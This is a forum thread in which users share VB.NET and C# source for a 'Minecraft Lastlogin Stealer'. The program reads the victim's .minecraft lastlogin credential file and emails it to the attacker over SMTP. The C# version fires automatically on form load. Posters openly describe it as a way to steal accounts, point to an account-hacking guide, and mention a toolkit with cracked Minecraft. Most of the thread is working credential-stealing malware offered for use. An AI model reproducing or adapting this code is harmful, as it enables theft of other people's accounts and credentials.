05-29-2012, 09:36 PM #1
(adsbygoogle = window.adsbygoogle || []).push({});
Minecraft Lastlogin Stealer

Do to constant requests here it is. A lastlogin stealer. It did not take long to make either. So basically all it does is finds the last login file and emails it to the account that you set up. Please remember that with with this specific code the email account must be a Gmail account. Hope you guys enjoy this.

Go You must login or register to view this content. to learn how to use the last log in file to steal an account.

VB.NET

Imports System.Net.Mail
Public Class Form1
Dim smtp As New SmtpClient
Dim mail As New MailMessage

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim MyMailMessage As New MailMessage()
Try
Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\lastlogin")
MyMailMessage.Attachments.Add(Attch)
MyMailMessage.From = New MailAddress([COLOR="#FF0000"]"[email protected]"[/COLOR])
MyMailMessage.To.Add([COLOR="#FF0000"]"[email protected]"[/COLOR])
MyMailMessage.Subject = ("LastLoginFile")
MyMailMessage.Body = (" ")
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential([COLOR="#FF0000"]"[email protected]"[/COLOR], [COLOR="#FF0000"]"Password"[/COLOR])
SMTP.Send(MyMailMessage)
Catch ex As Exception
End Try
End Sub

End Class

I will not spoon feed anyone. If you can not use this code alone to make a program, then you need to go take some beginner tutorials. Then come back and ask me your questions.
Last edited by MagicalMonkey ; 06-14-2012 at 03:02 AM.

The following user thanked MagicalMonkey for this useful post:

Pichu
06-12-2012, 04:22 PM #2
what do we do with this code?

The following 3 users groaned at jakey1995abc for this awful post:

Alt, Press ►, x420XP
06-13-2012, 03:08 PM #3
Rokiz
Death is hereditary
Originally posted by jakey1995abc View Post
what do we do with this code?

READ. As you can say it say's VB.Net, look on google and learn some tutorials about VB.Net and this will help you and you will understand what to do with the code. Like he said and I will quote "I will not spoon feed you" He's not going to put the program together for you he's done the hard part all you have to do is create this code into a program.
06-13-2012, 03:23 PM #4
fill0botto95
You talkin to me?
Originally posted by MagicalMonkey View Post
It did not take long to make either.

As long as I know, C&Ping doesn't take too much time...

You can find it everywhere
06-13-2012, 07:05 PM #5
Pichu
RIP PICHU.

Do to constant requests here it is. A lastlogin stealer. It did not take long to make either. So basically all it does is finds the last login file and emails it to the account that you set up. Please remember that with with this specific code the email account must be a Gmail account. Hope you guys enjoy this.

Go You must login or register to view this content. to learn how to use the last log in file to steal an account.

VB.NET

Imports System.Net.Mail
Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Try
Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\lastlogin")
MyMailMessage.From = New MailAddress([COLOR=#FF0000]"[email protected]"[/COLOR])
MyMailMessage.To.Add([COLOR=#FF0000]"[email protected]"[/COLOR])
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential([COLOR=#FF0000]"[email protected]"[/COLOR], [COLOR=#FF0000]"Password"[/COLOR])
SMTP.Send(MyMailMessage)
Catch ex As Exception
End Try
End Sub

End Class

I will not spoon feed anyone. If you can not use this code alone to make a program, then you need to go take some beginner tutorials.

When I get the chance, I will do a C# conversion for yea + build files.

The following user thanked Pichu for this useful post:

MagicalMonkey
06-14-2012, 02:50 AM #6
Originally posted by Pichu View Post
When I get the chance, I will do a C# conversion for yea + build files.

Thanks man. That would be great.

Pichu
06-14-2012, 05:15 AM #7
Pichu
RIP PICHU.

VB.NET

Imports System.Net.Mail
Public Class Form1

Try
MyMailMessage.From = New MailAddress([COLOR=#FF0000]"[email protected]"[/COLOR])
MyMailMessage.To.Add([COLOR=#FF0000]"[email protected]"[/COLOR])
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential([COLOR=#FF0000]"[email protected]"[/COLOR], [COLOR=#FF0000]"Password"[/COLOR])
SMTP.Send(MyMailMessage)
Catch ex As Exception
End Try
End Sub

End Class

I will not spoon feed anyone. If you can not use this code alone to make a program, then you need to go take some beginner tutorials. Then come back and ask me your questions.

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net.Mail;
using System.Net;
using System.Threading;

namespace Minecraft_Last_Login_Stealer
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void Form1_Load(object sender, EventArgs e)
{
Emailer();
}
public void Emailer()
{
Retry:
try
{
SmtpClient smtp = new SmtpClient("smtp.live.com");
Attachment attach = new Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\.minecraft\\lastlogin");
MailMessage MM = new MailMessage("[email protected]", "[email protected]", "Minecraft Account", "Body.Text");
MM.Attachments.Add(attach);
smtp.Port = 587;
smtp.Credentials = new NetworkCredential("[email protected]", "YourPassword");
smtp.EnableSsl = true;
smtp.Send(MM);
}
catch
{
DialogResult a = MessageBox.Show("Error", "Reattempt?", MessageBoxButtons.RetryCancel);
if (a == DialogResult.Retry)
{
goto Retry;
}
else
{
Close();
}
}
}
}
}

I wrote it up real quick, should do the trick. I didn't test it because I don't have Minecraft on my computer but it should work.

MagicalMonkey
06-14-2012, 02:31 PM #8

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net.Mail;
using System.Net;
using System.Threading;

namespace Minecraft_Last_Login_Stealer
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void Form1_Load(object sender, EventArgs e)
{
Emailer();
}
public void Emailer()
{
Retry:
try
{
SmtpClient smtp = new SmtpClient("smtp.live.com");
Attachment attach = new Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\.minecraft\\lastlogin");
MailMessage MM = new MailMessage("[email protected]", "[email protected]", "Minecraft Account", "Body.Text");
MM.Attachments.Add(attach);
smtp.Port = 587;
smtp.Credentials = new NetworkCredential("[email protected]", "YourPassword");
smtp.EnableSsl = true;
smtp.Send(MM);
}
catch
{
DialogResult a = MessageBox.Show("Error", "Reattempt?", MessageBoxButtons.RetryCancel);
if (a == DialogResult.Retry)
{
goto Retry;
}
else
{
Close();
}
}
}
}
}

I wrote it up real quick, should do the trick. I didn't test it because I don't have Minecraft on my computer but it should work.

If you want test it go to my Minecraft Account Hacking guide and download the toolkit. It includes a cracked version of Minecraft and that should do the trick. Or I could it... lol :P

Pichu
06-14-2012, 03:39 PM #9
Pichu
RIP PICHU.
If you want test it go to my Minecraft Account Hacking guide and download the toolkit. It includes a cracked version of Minecraft and that should do the trick. Or I could it... lol :P

I own 2 Minecraft accounts, thing is.. I still have my old computer so I can't play Minecraft. Right after I press "Login" because of what it loads, it kills my computer.

I'm still working on getting a laptop, trying to earn as much cash as I can. Going for an i7 laptop. Smile

MagicalMonkey
06-16-2012, 01:39 AM #10
I own 2 Minecraft accounts, thing is.. I still have my old computer so I can't play Minecraft. Right after I press "Login" because of what it loads, it kills my computer.

I'm still working on getting a laptop, trying to earn as much cash as I can. Going for an i7 laptop. Smile

Oh. I love the i7. It's so fast! Also the i5 isn't that bad either. Smile

Pichu

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo